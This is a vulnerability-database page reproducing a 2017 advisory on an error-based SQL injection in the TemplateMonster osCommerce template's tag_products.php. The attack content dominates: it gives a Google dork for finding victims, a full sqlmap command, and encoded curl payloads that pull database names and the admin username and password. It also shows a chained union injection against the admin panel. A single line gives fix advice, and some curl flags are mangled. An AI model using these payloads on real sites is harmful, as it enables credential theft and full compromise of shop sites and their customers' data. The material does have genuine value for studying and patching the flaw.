Vulners
Lucene search
osCommerce Error-based SQL Injection
🗓️ 03 May 2017 00:00:00Reported by Project InsecurityType 
packetstorm🔗 packetstormsecurity.com👁 51 Views
` ______ ______ _____ ___ _____ _____ _____
| ___ \ | ___ \ | _ | |_ | | ___| / __ \ |_ _|
| |_/ / | |_/ / | | | | | | | |__ | / \/ | |
| __/ | / | | | | | | | __| | | | |
| | | |\ \ \ \_/ / /\__/ / | |___ | \__/\ | |
\_| \_| \_| \___/ \____/ \____/ \____/ \_/
_____ _ _ _____ _____ _____ _ _ ______ _____ _____ __ __
|_ _| | \ | | / ___| | ___| / __ \ | | | | | ___ \ |_ _| |_ _| \ \ / /
| | | \| | \ `--. | |__ | / \/ | | | | | |_/ / | | | | \ V /
| | | . ` | `--. \ | __| | | | | | | | / | | | | \ /
_| |_ | |\ | /\__/ / | |___ | \__/\ | |_| | | |\ \ _| |_ | | | |
\___/ \_| \_/ \____/ \____/ \____/ \___/ \_| \_| \___/ \_/ \_/
[+]---------------------------------------------------------[+]
| Vulnerable Software: TemplateMonster osCommerce |
| Vendor: http://templatemonster.org |
| Vulnerability Type: Error-based SQL Injection |
| Date Released: 23/04/2017 |
| Released by: Project Insecurity (@insecurity)|
[+]---------------------------------------------------------[+]
TemplateMonster is a site that makes templates for various content management systems. There are severe SQL injection
issues in their template for popular CMS 'osCommerce' - this can lead to a complete system compromise of any site using this
template. Estimated around 70k-100k vulnerable sites although not that many are indexed on google.
This source apears to be a developer from templatemonster releasing source code publicly instead of forcing users to pay for it.
The source is vulnerable to SQL INJECTION in the tag_products.php file:
https://github.com/templatemonster/oscommerce/blob/master/theme/tag_products.php
The code for this file can be seen below:
-------------------------------------------------------------------------------------------------------------
$tag_id= $HTTP_GET_VARS['id_tag'];
$tag_text="";
$tags_query = tep_db_query("select * from ". TABLE_TAGS ." where tag_id='". $tag_id ."'");
while ($tags_result = tep_db_fetch_array($tags_query)) {
$tag_text = urldecode($tags_result['tag_text']);
}
-------------------------------------------------------------------------------------------------------------
As you can see above, it does not escape the SQL statement and accepts any value for the id_tag GET param
Basic PoC of how exploitation would take place using SQLMap + cURL (and html2text for sorting):
-------------------------------------------------------------------------------------------------------------
#OsCommerce TemplateMonster ERROR BASED SQL Injection Vulnerability Checker & Exploiter
#Google Dork: inurl:tag_products inurl:id_tag -github
#Sqlmap Command: python sqlmap.py -u http://localhost/tag_products.php?id_tag=6 --dbms=MYSQL --random-agent --level=5 --risk=3 --threads=10 --test-filter=FLOOR
#Requirements: curl, html2text, grep, head
#curl -s http://localhost/tag_products.php?id_tag=9%20%20AND%20%28SELECT%206354%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20%28ELT%286354%3D6354%2C1%29%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.plugins%20GROUP%20BY%20x%29a%29 |grep "<font"|html2text|head -n1
-------------------------------------------------------------------------------------------------------------
#Get results in clear form
#|grep "<font"|html2text|head -n1| cut -d"'" -f2| rev | cut -c 2- | rev
#Change Limit 1,1 to Limit 2,1 etc to find database names
#curl AC/a!as http://localhost/tag_products.php?id_tag= 6%20AND%20%28SELECT%205140%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20%0A |grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
-------------------------------------------------------------------------------------------------------------
#Current Database
#curl AC/a!as http://localhost:80/tag_products.php?id_tag=6%20AND%20%28SELECT%207847%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
-------------------------------------------------------------------------------------------------------------
#Admin Password change CURRENT_DATABASE to database found in previous request
# curl AC/a!as http://localhost/tag_products.php?id_tag=6%20AND%20%28SELECT%204796%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28user_password%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20%24CURRENT_DATABASE.administrators%20ORDER%20BY%20user_password%20LIMIT%200%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
-------------------------------------------------------------------------------------------------------------
#Admin User_Name change CURRENT_DATABASE to database found in request beforehand
# curl AC/a!as http://localhost/tag_products.php?id_tag=6%20AND%20%28SELECT%204796%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28%28SELECT%20MID%28%28IFNULL%28CAST%28user_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20%24CURRENT_DATABASE.administrators%20ORDER%20BY%20user_password%20LIMIT%200%2C1%29%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29|grep "<font"|html2text|head AC/a!an1|cut AC/a!ad"'" -f2|rev |cut AC/a!ac 2-|rev
-------------------------------------------------------------------------------------------------------------
Public Vulnerability that can be used in conjunction to this exploit:
https://www.exploit-db.com/exploits/31515/
Once the credentials have been stolen and an attacker has logged into the admin panel they can run union based SQL injection queries
and thus be able to steal the database faster and be able to read files and/or input into files causing complete system compromise.
http://[HOST]/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --
Btw, we will write an actual PoC for this that can be ran as a python or bash script if any of you guys are interested :)
For both of these exploits (0day + public vuln) used in conjunction with eacohter. Let us know if there's any appeal for that.
-------------------------------------------------------------------------------------------------------------
How to fix: properly escape SQL queries / sanatize user inputs.. no response from vendor after months and months of effort. Despite
MANY websites being vulnerable. Some vuln site admins contacted, seemed panicked (and rightfully so)
[+]---------------------------------------------------------[+]
| CONTACT US: |
| |
| IRC: irc.insecurity.zone (6667/6697) #insecurity |
| Twitter: @insecurity |
| Website: insecurity.zone |
[+]---------------------------------------------------------[+]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 May 2017 00:00Current
0.2Low risk
Vulners AI Score0.2